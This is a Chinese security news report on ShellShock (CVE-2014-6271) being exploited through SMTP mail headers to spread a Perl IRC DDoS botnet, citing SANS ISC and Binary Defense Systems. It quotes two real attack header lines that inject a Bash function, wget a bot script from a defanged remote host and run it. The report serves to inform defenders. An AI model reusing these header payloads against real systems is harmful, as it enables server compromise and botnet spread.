Bash破壳漏洞(ShellShock)再变身:针对邮件服务器SMTP攻击
Bash破壳漏洞(ShellShock,CVE-2014-6271)新的利用方法又来了!根据互联网风暴中心( SANS InternetStorm Center )最新消息:破壳漏洞最新利用方法引发的新一轮攻击正在酝酿中,这一次,破壳漏洞形成的僵尸网络利用的是邮件服务器SMTP主机,目标是全球SMTP网关!
黑客们在试图破坏SMTP系统
“嘿,我的老板啊,这次互联网风暴意味着什么你造吗?意味着我给你回邮件都是危险的!”(算了,我不回你了啊= =)
这次“破壳”利用的就是感染SMTP网关,试图在MTAs / MDAs中寻找可利用弱点,然后攻击者把恶意代码隐藏在消息数据报头中!
互联网风暴中心描述了一个用Perl编写的IRC DDoS Robot,其Payload拥有“获取和执行远程代码的能力”。
下面一个图片就是包含“破壳”有效载荷的初始邮件攻击例子:
二进制防御系统BDS(Binary Defense Systems)已经主动侦查到最新的攻击细节。 那些已被破坏系统试图通过破壳漏洞传播僵尸网络,并在每个主要头字段使用“破壳”漏洞下载僵尸网络脚本。攻击者利用的字段有:“To:”字段、“From:”字段、 “Subject”字段、 “Date:”字段、 “Message ID:” 等等还有其他未发现字段
Message-ID:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend
References:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend
BDS还还透露:
“为了感染SMTP网关,并把它添加到现有僵尸网络设备中去,有一个curl/wget/fetch/perl/lwp/etc的方法正在试图从耶利哥安全团队(Jericho Security Team)摧毁基于perl的僵尸网络。”
自从九月初发现“破壳”起,弹震症漏洞已经针对目标,在不同类型的设备上重复利用了许多次。许多安全专家也相继发现了多次利用“破壳”漏洞攻击全球设备的僵尸网络,包括攻击 VOIP系统 和利用竞选传播恶意软件的混乱的僵尸网络。
蜜罐由专家AlienVault实验室检测到试图利用“破壳”漏洞的两个不同恶意软件样本,消息披露至此不超过48小时。
9月底,火眼研究室(FireEye)也预言:“从恶意流量上观察发现,试图利用Bash bug的大规模网络攻击正在路上。”
目前相关报道还比较少,更多内容请留意FreeBuf.COM带来的跟踪报道
[参考信息theregister&SA,编译/FB小编凌晨几度i,转载请注明来自FreeBuf.COM]
- Flash/Flex学习笔记(9):ActionScript3.0与Javascript的相互调用
- Flash/Flex学习笔记(8):ActionScript3.0中的面对对象
- Docker网络解决方案-Weave部署记录
- Flash/Flex学习笔记(7):FMS3.5基于IIS的安装
- Netdata---Linux系统性能实时监控平台部署记录
- linux下向一个文件中的某行插入数据的做法
- Flash/Flex学习笔记(2):捕获摄像头
- split-brain 脑裂问题(Keepalived)
- Android新手之旅(3) 信息的输出
- Nginx code 状态码说明
- Flash/Flex学习笔记(6):制作基于xml数据源的flv视频播放器
- proxy_pass根据path路径转发时的"/"问题记录
- 温故而知新:查看端口占用情况以及DOS中的管道操作/重定向操作
- Android新手之旅(7) RadioButton的自定义
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法